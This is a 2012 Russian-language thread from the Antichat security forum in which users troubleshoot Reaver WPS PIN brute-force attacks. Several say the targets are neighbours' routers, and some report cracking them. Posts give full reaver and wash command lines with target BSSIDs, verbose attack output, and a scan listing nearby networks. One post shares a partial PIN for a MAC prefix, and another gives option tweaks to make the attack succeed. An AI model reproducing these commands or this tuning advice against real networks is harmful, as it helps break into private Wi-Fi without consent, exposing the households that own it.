HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #351  
Старый 20.11.2012, 13:03
pav087
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме:
5129

Репутация: 0
По умолчанию

Цитата:
Сообщение от Buran  

На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.

Изначально начался подбор на родном маке TL-WN7200ND, но дошел до 11% и все никак, тепер WARNING: Receive timeout occurred лезет и всё, хоть сначала подбирай или с последнего пина всеравно ошибки..

Мак подставлял клиента, который ассоциировался на этой точке, но также пробовал запускать ривер с 2-x других wifi карт соответственно с разными маками, та же беда лезет, хотя на этих картах другие точки также ломались как и на TL-WN7200ND...
 
Ответить с цитированием

  #352  
Старый 20.11.2012, 18:09
vedemur
Member
Регистрация: 12.11.2012
Сообщений: 105
Провел на форуме:
33155

Репутация: 0
По умолчанию

Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

с другими- [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

и так 10 раз и ступор.

Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.
 
Ответить с цитированием

  #353  
Старый 24.11.2012, 23:10
user_bad
Познающий
Регистрация: 24.02.2008
Сообщений: 65
Провел на форуме:
132279

Репутация: 23
По умолчанию

Цитата:
Сообщение от vedemur  

Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

с другими- [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

и так 10 раз и ступор.

Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.

второй случай имею на роутере NETGEAR и ничего не получается, как будто М5 вообще не бывает, переставлял цифирку подбор идет дальше но результата нет...
 
Ответить с цитированием

  #354  
Старый 26.11.2012, 10:54
pav087
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме:
5129

Репутация: 0
По умолчанию

Отпишусь по своей проблеме - WARNING: Receive timeout occurred

Отключили в доме свет не надолго, подбор пошел опять, видимо точка блокировалась, а после перезагрузки опять давала подобрать.

PIN

80:1F:02:06:x:x - 686018xx может кому пригодится...
 
Ответить с цитированием

  #355  
Старый 27.11.2012, 11:35
SubFear
New Member
Регистрация: 25.11.2012
Сообщений: 4
Провел на форуме:
861

Репутация: 0
По умолчанию

F1! F1! F1!

BackTrack 5 R3 BlackHat

root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 11

[+] Waiting for beacon from 52:26:ED:8F:4D:E2

[+] Associated with 52:26:ED:8F:4D:E2 (ESSID: HDS)

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

root@bt:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool

Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner

BSSID Channel RSSI WPS Version WPS Locked ESSID

---------------------------------------------------------------------------------------------------------------

14:A9:E3:03:24:22 1 -84 1.0 No dmitriyconshin

14:A9:E3:02:4B:3A 1 -81 1.0 No Domolink_451608_R_msk

00:26:5A:319:50 1 -86 1.0 No dlink

C8:6C:87:41:25:1F 1 -76 1.0 No O_O

50:67:F0:16:FE:3C 1 -87 1.0 No Andrey

14:A9:E3:01:50:0E 1 -87 1.0 No DOMOLINK_FREEPORT_01500E

B0:B2C:3C:7C:30 1 -86 1.0 No Domolink_532202_R_msk

14:A9:E3:02:18:C6 3 -80 1.0 No DOMOLINK_FREEPORT_0218C6

34:08:04:14:7C:BE 6 -86 1.0 No dlink

20:CF:30:CE:10:59 11 -86 1.0 No mksbag

пробовал включать aireplay-ng но как он должен работать я не в курсе. не помогло. я вообще в линуксе 0. пока иду на ощупь, с закрытыми глазами. помогите плз. может советом, может ссылочкой на мануальчик. сейчас думаю попробовать wifislax 4.2 final/ может он поможет. только какие там команды прописывать....

та сетка которую я пытаюсь нагнуть имеет самый сильный сигнал. в wash она присутствует. просто в поле копирования не попала.

кстати. я пробовал reaverom все сетки корячить. и у всех одно и тоже. ломанул только одну. с совершенно убогим сигналом. минут за 20.
 
Ответить с цитированием

  #356  
Старый 27.11.2012, 11:53
user100
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
Провел на форуме:
884729

Репутация: 373


По умолчанию

Цитата:
Сообщение от SubFear  

F1! F1! F1!

root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv.

Рекомендую прописать команду следующим образом:

reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv

Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.

Опция -a, позволяет оптимизировать работу Reaver.

Про доп опции к Reaver почитайте тут.

Уверены, что на точке "HDS" включен WPS ?

В приведенном вами списке wash её нет.
 
Ответить с цитированием

  #357  
Старый 27.11.2012, 12:04
SubFear
New Member
Регистрация: 25.11.2012
Сообщений: 4
Провел на форуме:
861

Репутация: 0
По умолчанию

Цитата:
Сообщение от user100  

Рекомендую прописать команду следующим образом:

reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv

Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.

Опция -a, позволяет оптимизировать работу Reaver.

Про доп опции к Reaver почитайте тут.

Уверены, что на точке "HDS" включен WPS ?<br/>
В приведенном вами списке wash её нет.

вчера пробовал прописывать -vv --dh-small результат тот же.

в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.
 
Ответить с цитированием

  #358  
Старый 27.11.2012, 12:52
user100
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
Провел на форуме:
884729

Репутация: 373


По умолчанию

Цитата:
Сообщение от SubFear  

вчера пробовал прописывать -vv --dh-small результат тот же.

в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.

Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.
 
Ответить с цитированием

  #359  
Старый 27.11.2012, 13:46
SubFear
New Member
Регистрация: 25.11.2012
Сообщений: 4
Провел на форуме:
861

Репутация: 0
По умолчанию

Цитата:
Сообщение от user100  

Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.

хороший сигнал по всей квартире. предполагаю что это ктото из соседей снизу либо сверху. у меня 1 с очень хорошим сигналом 3-4 с нормальным. и ещё 5-7 со слабым. вот одну со слабым я ломанул а с остальными такая вот засада.
 
Ответить с цитированием

  #360  
Старый 02.12.2012, 01:42
Oxy
New Member
Регистрация: 29.11.2012
Сообщений: 11
Провел на форуме:
2318

Репутация: 0
По умолчанию

Взломал давно dir-615 c помощью dwa-510 + самопальная антенна, заняло около 10 суток, дак сейчас пароль хозяева сменили, а я пин забыл , точнее последние 4 цифры. Сейчас приспособил роутер с openwrt для этого дела. А вообще, плохи дела становятся с уязвимостью, почти все современные роутеры идут с отключенным wps. У меня из 15 сетей только 2 определяются как уязвимые.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.